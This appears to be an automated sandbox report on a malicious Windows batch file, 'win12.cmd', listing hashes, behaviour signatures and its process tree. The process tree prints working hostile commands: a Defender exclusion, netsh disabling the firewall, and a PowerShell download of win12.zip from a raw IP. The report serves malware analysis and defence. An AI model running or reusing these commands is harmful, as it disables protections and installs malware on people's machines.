Overview

overview

10

Static

static

1

win12.cmd

windows10-2004-x64

10

win12.cmd

windows11-21h2-x64

10

Analysis

  • max time kernel
    18s
  • max time network
    22s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/11/2024, 10:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    win12.cmd

  • Size

    3KB

  • MD5

    c017186534dbc3d9a29f34d8925a4a96

  • SHA1

    6bebafd5a50ddc96f9ede400c842b9c09ee8b38f

  • SHA256

    d9d9750e2dca4abfb7eb23bb48dd0484b4a6e44ef970133fce40769f4308aa3f

  • SHA512

    8b40346ba61af805a1ce91e68d9cba8e9451e629bfe84ca6ae3e4b6eaab28625e39bac73338e78ad98cfc56abd7f6b6b25467e0327970b6351e494c6524e48d6

Score
10/10
evasionexecutionpersistenceprivilege_escalation

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://172.245.20.209/win12.zip

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\win12.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4840
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:1620
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1148
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "netsh advfirewall set allprofiles state off"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4416
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:1564
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'www.google.nl' -OutFile C:\Users\Admin\AppData\Local\Temp\tmp.nl"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2540
      • C:\Windows\system32\cscript.exe
        cscript /nologo C:\Users\Admin\AppData\Local\Temp\temprunner.vbs
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2208
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\batman.cmd
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5088
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "(New-Object Net.WebClient).DownloadFile('http://172.245.20.209/win12.zip', 'C:\Users\Admin\AppData\Local\Temp/win12.zip')"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4208

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      d5161575b78a7cfb6fdce2dfd363031d

      SHA1

      ca17416fdfa39530d5c3157a26703d277e8ec43f

      SHA256

      a86fc8ce58db084b06f81b478f12d45540069e37d01f11307e77f8225dca3fee

      SHA512

      a66f2112f02f1e7772bd93e387df43000c96ea32148a3dc598b12e464027b7628b9988c162e574ea4483a69ef9c8e02932163b1f7924c0331b76e827223e273a

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      446dd1cf97eaba21cf14d03aebc79f27

      SHA1

      36e4cc7367e0c7b40f4a8ace272941ea46373799

      SHA256

      a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

      SHA512

      a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      829011d7504c4b270a983e60020e71f8

      SHA1

      50bfc854e8832b133c3a2d8a1c6d55a987bf36be

      SHA256

      4b82db2009cce4dc7b887aa9a865cc18c1f0ca085170a165a67757fed0887f52

      SHA512

      116469a7f44ebaae81da56deb7b16abf8c3a3992781e4966ce207273e7c24f2c6bb7c0994edacc7bb57d51167ae09284ed93d7c6b177295a1494511eff8aeecc

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vpd3a3rf.cvq.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\batman.cmd
      Filesize

      415B

      MD5

      26bd89e8bc0673dfb84d4ca2fdf0bf0f

      SHA1

      6bba36e4d7ec831b6f719faadeab83656f6f96e4

      SHA256

      99f9cd8080bad04520a95853d52fb38d0ab23146ae9068ef072521605857e694

      SHA512

      442dc975211e81525a25088af0616026f53adc4336f571f1d5407fc5605b456dda8febe5aaf0631bce015627b71d9c9875a14dd2ae4d83eb59a0605deadbe05c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\temprunner.vbs
      Filesize

      153B

      MD5

      cf980901c73aa6cfb5cc8353ee50ef87

      SHA1

      3a241bfc80ba171120893ce2354cf0019fee4c69

      SHA256

      118148188be80ffe226f269f9bc06cc4dbf048479ceca3f408ae1a16e61899e6

      SHA512

      4cdcc5dec7fe0cbf13d2c25cfbeaa47cd1da32a5acdde656059e0b02dba3691c31afa4989bf669ef590e431404d34462880e3018a041cd79671990acafa2fa22

      Download Submit

    • memory/1148-10-0x000001CD42F90000-0x000001CD42FB2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1148-0-0x00007FFA28F13000-0x00007FFA28F15000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1148-16-0x00007FFA28F10000-0x00007FFA299D1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1148-15-0x000001CD42C40000-0x000001CD42E5C000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/1148-12-0x00007FFA28F10000-0x00007FFA299D1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1148-11-0x00007FFA28F10000-0x00007FFA299D1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2540-43-0x000001B1EF050000-0x000001B1EF7F6000-memory.dmp

      Filesize

      7.6MB

      Download

    • memory/4416-18-0x00007FFA28F10000-0x00007FFA299D1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4416-32-0x00007FFA28F10000-0x00007FFA299D1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4416-30-0x00007FFA28F10000-0x00007FFA299D1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4416-19-0x00007FFA28F10000-0x00007FFA299D1000-memory.dmp

      Filesize

      10.8MB

      Download